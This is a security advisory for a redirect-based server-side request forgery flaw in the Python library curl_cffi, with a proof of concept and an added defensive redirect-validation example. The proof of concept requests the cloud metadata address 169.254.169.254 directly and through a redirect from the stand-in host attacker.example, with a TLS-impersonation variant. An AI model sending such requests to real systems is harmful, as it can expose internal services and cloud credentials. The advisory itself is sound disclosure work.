GHSA-qw2m-4pqf-rmpp

Source
https://github.com/advisories/GHSA-qw2m-4pqf-rmpp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qw2m-4pqf-rmpp/GHSA-qw2m-4pqf-rmpp.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qw2m-4pqf-rmpp
Aliases
  • CVE-2026-33752
Published
2026-04-03T21:36:44Z
Modified
2026-04-03T21:51:09.563841Z
Severity
  • 8.6 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Summary
curl_cffi: Redirect-based SSRF leads to internal network access in curl_cffi (with TLS impersonation bypass)
Details

Summary

curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl.

Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls.

Details

The issue comes from how curl_cffi handles outbound requests:
  • User-supplied URLs are passed directly to libcurl without checking whether they resolve to internal IP ranges (e.g., 127.0.0.1, 169.254.0.0/16).
  • Redirects are automatically followed (CURLOPT_FOLLOWLOCATION = 1) inside libcurl.
  • There is no validation of redirect destinations at the Python layer.

This means that even if an application only allows requests to external URLs, an attacker can:
  • Provide a URL pointing to an attacker-controlled server
  • Return a redirect response pointing to an internal service
  • Have curl_cffi follow that redirect automatically

As a result, internal endpoints (such as cloud instance metadata APIs) can be accessed.

Additionally, curl_cffi supports TLS fingerprint impersonation (e.g., impersonate="chrome"). In environments where outbound requests are filtered based on TLS fingerprinting, this can make such requests harder to detect or block.

This behavior is similar to previously reported redirect-based SSRF issues such as CVE-2025-68616, where redirects allowed access to unintended internal resources.

PoC

  1. Direct internal request
    import curl_cffi
    resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
    print(resp.text)

  2. Redirect to internal service
    Attacker server:
    GET /test
    → 302 Location: http://169.254.169.254/latest/meta-data/

    Victim code:
    import curl_cffi
    resp = curl_cffi.get("https://attacker.example/test")
    print(resp.text)

    Result
  • Initial request goes to attacker server
  • Redirect is returned
  • libcurl follows the redirect automatically
  • Internal metadata endpoint is accessed

  3. With TLS impersonation
    import curl_cffi
    resp = curl_cffi.get(
        "https://attacker.example/test",
        impersonate="chrome")

    In some environments, this may help the request bypass TLS-based filtering controls.

Impact

An attacker who can control the requested URL may be able to:
  • Access internal network services
  • Reach cloud metadata endpoints and retrieve sensitive information
  • Bypass certain outbound filtering mechanisms (depending on environment)

This corresponds to CWE-918 (Server-Side Request Forgery).
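The Python-layer validation the advisory describes as missing, as an added example (not curl_cffi's own code): redirects are followed in Python rather than by libcurl, and every hop is resolved and checked against non-public ranges before it is requested. The `fetch` callable, the `resolve_host` default and the `allow_redirects=False` remark are assumptions; the test below feeds it a constructed 302 chain instead of real network traffic.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse


class SSRFBlocked(Exception):
    """Raised when a request, or any redirect hop, targets a non-public address."""


def is_internal_ip(ip_str):
    """True for loopback, link-local (169.254.169.254 included), RFC 1918 and other non-public ranges."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 must be judged as its IPv4 form
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_host(host):
    """Default resolver (assumption): every A/AAAA address the name maps to, via real DNS."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_url(url, resolver=resolve_host):
    """Reject non-http(s) URLs and any host that resolves to an internal address."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        raise SSRFBlocked(f"unsupported or hostless URL: {url}")
    for ip in resolver(parsed.hostname):
        if is_internal_ip(ip):
            raise SSRFBlocked(f"{parsed.hostname} resolves to internal address {ip}")


def safe_get(url, fetch, resolver=resolve_host, max_redirects=5):
    """Fetch url, following redirects in Python so every hop is validated first.

    fetch(url) is assumed to issue ONE request with redirect following disabled
    and return (status, headers, body); with curl_cffi that would mean passing
    allow_redirects=False so libcurl's CURLOPT_FOLLOWLOCATION is not used.
    Note: the client resolves the name again when it connects, so a DNS-rebinding
    window remains unless the checked IP is pinned for the connection.
    """
    for _ in range(max_redirects + 1):
        check_url(url, resolver)
        status, headers, body = fetch(url)
        location = {k.lower(): v for k, v in headers.items()}.get("location")
        if status in (301, 302, 303, 307, 308) and location:
            url = urljoin(url, location)  # relative Location resolved, then re-checked
            continue
        return status, body
    raise SSRFBlocked(f"more than {max_redirects} redirects")
```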

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:36:44Z",
    "severity": "HIGH",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-918"
    ]
}
References

Affected packages

PyPI / curl-cffi

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
0.15.0

Affected versions

0.*
0.1.5
0.2.0
0.2.1
0.2.4
0.2.5
0.3.0
0.3.1
0.3.2
0.3.7
0.3.8
0.4.0
0.5.0
0.5.1
0.5.2
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.9b1
0.5.9b2
0.5.9b3
0.5.9b4
0.5.9b5
0.5.9b6
0.5.9
0.5.10b1
0.5.10b2
0.5.10b3
0.5.10b4
0.5.10b5
0.5.10
0.6.0b2
0.6.0b4
0.6.0b7
0.6.0b9
0.6.0
0.6.1
0.6.2
0.6.3b1
0.6.3
0.6.4
0.7.0b4
0.7.0b6
0.7.0b7
0.7.0
0.7.1
0.7.2
0.7.3b1
0.7.3
0.7.4
0.8.0b1
0.8.0b3
0.8.0b6
0.8.0b7
0.8.1b8
0.8.1b9
0.9.0b1
0.9.0b2
0.9.0
0.10.0b1
0.10.0b2
0.10.0
0.11.0b1
0.11.0b2
0.11.0
0.11.1
0.11.2
0.11.3
0.11.4
0.12.0b1
0.12.0
0.12.1b1
0.12.1b2
0.13.0b1
0.13.0
0.14.0b1
0.14.0b2
0.14.0b3
0.14.0b4
0.14.0b5
0.14.0
0.15.0b1
0.15.0b2
0.15.0b3
0.15.0b4
0.15.0b5
0.15.0b6
0.15.0rc1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-qw2m-4pqf-rmpp/GHSA-qw2m-4pqf-rmpp.json"